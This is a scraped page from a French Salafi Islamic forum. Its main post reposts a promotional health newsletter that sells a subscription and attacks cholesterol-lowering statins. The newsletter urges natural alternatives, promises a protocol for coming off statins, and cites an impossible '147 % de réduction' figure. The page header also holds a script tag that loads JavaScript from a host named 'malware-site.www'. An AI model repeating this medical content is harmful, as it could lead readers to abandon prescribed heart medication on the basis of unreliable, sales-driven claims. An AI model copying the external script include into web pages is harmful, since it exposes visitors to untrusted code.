ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Juillet 2017

LunMarMerJeuVenSamDim
     12
3456789
10111213141516
17181920212223
24252627282930
31      

Calendrier Calendrier


    Cholestérol et maladies cardiovasculaires : le programme naturel qui a sauvé la vie du Président

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Cholestérol et maladies cardiovasculaires : le programme naturel qui a sauvé la vie du Président

    Message par assalafia le Mar 29 Sep - 12:56

    Cholestérol et maladies cardiovasculaires : le programme naturel qui a sauvé la vie du Président

    « Il faut faire baisser votre cholestérol, faire baisser votre cholestérol… »

    Vous avez forcément entendu cette ritournelle, répétée et répétée depuis des années dans les campagnes de prévention des maladies cardiovasculaires, et reprise – souvent de bonne foi – dans les cabinets médicaux.

    Une ritournelle qui, depuis 30 ans, permet aux laboratoires pharmaceutiques de vendre des centaines de millions de médicaments anticholestérol chaque année : les fameuses statines.

    Malgré le danger qu’elles peuvent présenter pour la santé, les statines rapportent tellement d’argent (130 milliards de dollars pour le seul Tahor depuis son lancement en 1997) qu’on ne va pas tuer la poule aux œufs d’or pour quelques « effets secondaires »…

    Et pourtant…

    Vous allez découvrir qu’un personnage extrêmement important, le Président de l’un des pays les plus puissants au monde (et sans doute le mieux informé de la réalité médicale et de l’efficacité des traitements) a choisi pour sa propre santé une tout autre voie que les statines… Une solution 100 % naturelle. Je vous en reparle un peu plus loin.

    Recettes pour un « bon » taux de cholestérol

    Dans le numéro des Dossiers Santé & Nutrition de septembre, le Dr Jean-Paul Curtay vous a révélé pourquoi la lutte acharnée menée depuis plus de trente ans contre le cholestérol était une erreur.

    Une erreur parce que ce n’est pas la baisse aveugle et globale du cholestérol qui réduit les risques de pathologies cardiovasculaires. Et parce que les médicaments employés dans cette lutte, statines en tête, favorisent le développement d’autres pathologies, au premier rang desquelles on trouve le diabète.

    Dans la suite de son enquête, publiée dans ce nouveau numéro des Dossiers Santé & Nutrition, le Dr Curtay révèle cette fois les solutions naturelles efficaces contre les pathologies cardiovasculaires.

    Et il va encore plus loin. Répondant aux nombreuses questions que le numéro du mois dernier a suscitées, il décrit les ripostes précises qui existent pour chaque pathologie, d’un « simple » excès de fer dans le sang à la présence d’un athérome en passant par l’hypertension et l’hyperactivité plaquettaire.

    Déjà sous statines ? Pas de panique : le Dr Curtay pose aussi les bases d’un protocole de sortie en douceur de ce traitement.

    Vous l’avez compris, ce numéro des Dossiers Santé & Nutrition s’impose comme un véritable manuel de survie pour se prémunir et guérir des pathologies cardiovasculaires sans courir les risques induits par la prise de statines.

    Les 6 vraies règles d’or pour la santé cardiovasculaire

    Ce dossier s’adresse donc à tous. Le Dr Curtay rappelle deux informations capitales :


    • Un bon taux de cholestérol n’est pas un taux bas dans l’absolu, c’est notamment un taux où le rapport entre le cholestérol LDL et le cholestérol HDL est inférieur à 3,5 voire 3.
    • Le cholestérol ne se retrouve mêlé aux pathologies cardiovasculaires que modifié, par le tabac, la pollution ou l’inflammation : c’est donc contre ces facteurs qu’il nous faut avant tout lutter.


    Pour ceux qui souhaitent se prémunir contre de futurs problèmes, le Dr Curtay dégage ainsi six règles d’or à respecter dès aujourd’hui :


    • Ne pas fumer : une seule cigarette par jour augmente les risques d’AVC, de coronaropathie et d’infarctus de 40 % !
    • Assainir son environnement pour minorer les effets de la pollution aérienne sur l’organisme, mais aussi déjouer l’influence des produits toxiques dans de nombreux produits de consommation courante.
    • Détoxifier les polluants que l’on ne peut éviter, de façon simple comme préférer l’eau avant toute chose, ou en faisant des cures spécifiques.
    • Ne pas être en surpoids, pour enrayer l’apparition des marqueurs sanguins de l’inflammation comme la C-réactive protéine (CRP), désormais reconnue comme un facteur de risque cardiovasculaire à part entière.
    • Eviter les montées excessives de glucose pour ne pas devenir résistant à l’insuline, ce qui provoque une baisse des HDL.
    • Se protéger des autres causes d’inflammation, en s’inspirant de deux régimes alimentaires et modes de vie qui ont fait leurs preuves dans la prévention de pathologies cardiovasculaires : le modèle méditerranéen et le modèle Okinawa.


    Pour chacune de ces six règles, le Dr Curtay détaille à la fois ses effets bénéfiques sur la santé et surtout les moyens d’y parvenir.

    Se protéger des pathologies… sans se ruiner la santé !

    Retenez bien ceci : il faut arrêter de masquer les symptômes des maladies cardiovasculaires avec des médicaments comme les statines, et traiter leurs véritables causes.

    Le stress et le surmenage sont en grande partie responsables. Or, l’un des mécanismes par lesquels le stress est un facteur d’inflammation et de risque cardiovasculaire est un excès de fer dans les cellules.

    Demandez à votre médecin d’ajouter à votre bilan sanguin votre taux de ferritine, représentatif du stock de fer dans le foie. D’une manière globale, il est indispensable de réduire à des proportions raisonnables notre consommation de l’aliment le plus riche en fer : la viande. Et de préférer les aliments d’origine végétale…

    Le dossier du Dr Curtay détaille également ce qu’il faut faire en cas d’excès de fer, ainsi que les compléments qui peuvent freiner ou neutraliser la pénétration du fer dans les cellules.

    L’hypertension est une cause aussi connue… que mal soignée ! Comme l’ont souligné de nombreux chercheurs, un régime nutritionnel adapté est plus efficace que des médicaments de synthèse. Vous verrez pourquoi le magnésium et l’arginine contenus dans les oléagineux ont des effets antihypertenseurs et cardioprotecteurs naturels.

    L’hyperactivité plaquettaire, cause majeure des pathologies cardiovasculaires, est souvent attribuée à tort au cholestérol ; dans ce dossier, le Dr Curtay dévoile la carte d’identité de ses deux principaux responsables :


    • L’homocystéine, un acide aminé qui épaissit les artères et dont l’élévation du taux entraîne des risques de phlébite, embolie, AVC. Son rôle a longtemps été sous-estimé jusqu’à ce que son implication soit reconnue par la communauté scientifique. Et vous comprendrez pourquoi il est plus important de faire doser l’homocystéine dans son bilan que le cholestérol !!!
    • Idem pour la Lp(a), une lipoprotéine produite par le foie dont l’importance dans l’organisme de l’individu est d’origine purement génétique, et qui peut avoir les mêmes conséquences que l’homocystéine. Un simple aliment, que vous avez dans votre cuisine, est d’une redoutable efficacité contre la Lp(a).


    Aux cotés du curcuma, des antioxydants, des polyphénols, de la chondroïtine sulfate et du silicium, vous allez découvrir deux autres protecteurs cardiovasculaire essentiels : les vitamines D et K.

    Une information particulièrement essentielle à l’heure où l’un des anticoagulants les plus fréquemment prescrits par les cardiologues est des antivitamines K, des médicaments qui causent la précocité de l’ostéoporose, mais aussi la calcification des artères et le risque d’accumuler les types de plaques les plus dangereuses…

    Le programme sans statine qui a soigné le président !

    Je vous en ai parlé au début de cette lettre, et c’est en effet l’une des révélations les plus sensationnelles de ces Dossiers Santé & Nutrition d’octobre.

    Sans médicament – et donc sans statine – on peut faire régresser l’athérome (plaque de graisses dans les artères) et/ou prévenir très efficacement les récidives.

    Deux études historiques ne peuvent continuer à être ignorées par le corps médical.

    L’une d’elles a été menée par le Dr Dean Ornish, The Lifestyle Heart Trial. Elle concerne 48 patients coronariens répartis de manière randomisée en deux groupes, un groupe témoin et l’autre suivant un programme comprenant notamment :


    • Pas plus de 10 % des apports caloriques en graisses
    • Activités aérobic régulières
    • Arrêt du tabac
    • Techniques de gestion du stress et groupes de soutien psychologique
    • etc.


    Au bout de 5 ans on a observé :


    • 45 récidives chez les 20 patients témoins contre 25 chez les 28 du groupe d’intervention (147 % de réduction)
    • La sténose des artères coronaires s’est aggravée de 27,7 % dans le groupe témoin, alors qu’elle a régressé de 7,9 % dans le groupe d’intervention
    • 82 % des patients ont montré une amélioration de leur diamètre coronarien dans le groupe d’intervention


    L’une des plus importantes caisses d’assurance maladie aux Etats Unis, Medicare, rembourse le programme de rééducation cardiaque de Dean Ornish, qui a été suivi avec succès par… le président Bill Clinton !!!

    Le verdict est sans appel.

    Et il a été largement confirmé par l’étude française du Dr Michel de Lorgeril sur le modèle méditerranéen, qui observe une réduction des décès cardiaques de 76 % et une réduction des infarctus de 73 % !

    Ces chiffres, comme beaucoup d’autres informations, sont à retrouver dans le numéro d’octobre des Dossiers Santé & Nutrition, dont l’objectif sera atteint s’ils permettent « d’ouvrir » les opinions et les perspectives sur les maladies cardiovasculaires. Car il faut se souvenir que ces pathologies demeurent la première cause de décès dans le monde, selon l’OMS (Organisation Mondiale de la Santé).

    C'est le vendredi 2 octobre que ce nouveau numéro sera mis sous presse. Vous avez jusqu'au jeudi 1er octobre minuit pour demander vous aussi votre exemplaire.

    Cliquez ici pour en savoir plus sur les Dossiers Santé & Nutrition et accéder au formulaire d'abonnement sécurisé.



    À votre santé !

    Jean-Marc Dupuis

    ******************************

    Si vous n'êtes pas encore abonné à La Lettre Santé Nature Innovation et que vous souhaitez vous aussi la recevoir gratuitement, inscrivez-vous ici.

    ******************************

    Pour être sûr de bien recevoir La Lettre Santé Nature Innovation sans qu'elle se perde dans votre boîte de messagerie électronique, visitez la page suivante.

    ******************************

    Les informations de cette lettre d'information sont publiées à titre purement informatif et ne peuvent être considérées comme des conseils médicaux personnalisés. Aucun traitement ne devrait être entrepris en se basant uniquement sur le contenu de cette lettre, et il est fortement recommandé au lecteur de consulter des professionnels de santé dûment homologués auprès des autorités sanitaires pour toute question relative à leur santé et leur bien-être. L’éditeur n’est pas un fournisseur de soins médicaux homologués. L’éditeur de cette lettre d'information ne pratique à aucun titre la médecine lui-même, ni aucune autre profession thérapeutique, et s’interdit formellement d’entrer dans une relation de praticien de santé vis-à-vis de malades avec ses lecteurs. Aucune des informations ou de produits mentionnés sur ce site ne sont destinés à diagnostiquer, traiter, atténuer ou guérir une maladie.

    La Lettre Santé Nature Innovation est un service d'information gratuit de Santé Nature Innovation (SNI Editions).
    Pour toute question, rendez-vous ici.

    Service courrier : Sercogest, 44 avenue de la Marne, 59290 Wasquehal - France

      La date/heure actuelle est Ven 21 Juil - 23:39